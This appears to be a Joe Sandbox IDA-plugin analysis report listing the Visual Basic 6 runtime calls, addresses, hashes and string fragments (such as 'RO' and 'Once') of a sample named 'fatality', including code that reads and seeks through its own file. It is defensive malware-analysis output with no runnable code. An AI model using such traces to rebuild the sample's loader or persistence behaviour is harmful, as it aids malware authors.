                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,004025E6), ref: 0040C072
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,004025E6), ref: 0040C096
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C12C
                                                                                                                                                            • __vbaNew.MSVBVM60(0040564C), ref: 0040C13E
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C197
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C1C2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040C238
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C252
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040C259
                                                                                                                                                            • #529.MSVBVM60(00000008), ref: 0040C26D
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
                                                                                                                                                            • String ID: RO$C$Once$Start
                                                                                                                                                            • API String ID: 3306888832-2962527757
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D
                                                                                                                                                              • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                              • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                              • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                              • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0040AFEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040AFF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040B0D4
                                                                                                                                                            • #616.MSVBVM60(?,?), ref: 0040B0E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B0F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0040B111
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 0040B118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040B123
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B17F
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B1BD
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 0040B257
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B2DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040B2F3
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B312
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B324
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B399
                                                                                                                                                            • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040B3B2
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 0040B3D1
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040B3E3
                                                                                                                                                              • Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                              • Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                              • Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • #598.MSVBVM60 ref: 0040B3F0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
                                                                                                                                                            • String ID: PR$ SE$4
                                                                                                                                                            • API String ID: 3576955720-2816282373
                                                                                                                                                            • Opcode ID: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                            • Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
                                                                                                                                                            • Opcode Fuzzy Hash: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
                                                                                                                                                            • Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CEB4F32,00000000,00000FEE), ref: 004191A8
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004191B0
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004191B4
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004191CC
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004191DB
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 004191F4
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00419206
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419217
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041922B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419235
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00419245
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00419259
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041928D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004192A6
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B1A0,00000000), ref: 004192F5
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004192FE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041930B
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,0041B1A4,00000000), ref: 0041931C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,0041B110,00000000), ref: 0041932C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00419341
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00419359
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00419368
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?), ref: 00419379
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00419384
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 00419396
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041939F
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193CC
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 004193F8
                                                                                                                                                            • __vbaUI1I2.MSVBVM60 ref: 00419402
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3049632819-0
                                                                                                                                                            • Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
                                                                                                                                                            • Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CEBD9F5,00000000,6CEBD83C), ref: 00415DA5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415DAD
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 00415DB1
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415DFA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415E97
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415F32
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00416032
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041603C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 004160A5
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160D9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00416126), ref: 00416103
                                                                                                                                                            • __vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00416123
                                                                                                                                                              • Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2812220623-0
                                                                                                                                                            • Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
                                                                                                                                                            • Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412929
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412938
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041294C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041296A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412971
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129B3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129CE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00412A2E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412A39
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A49
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A64
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412A8C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412AAA
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412AC2
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412ACD
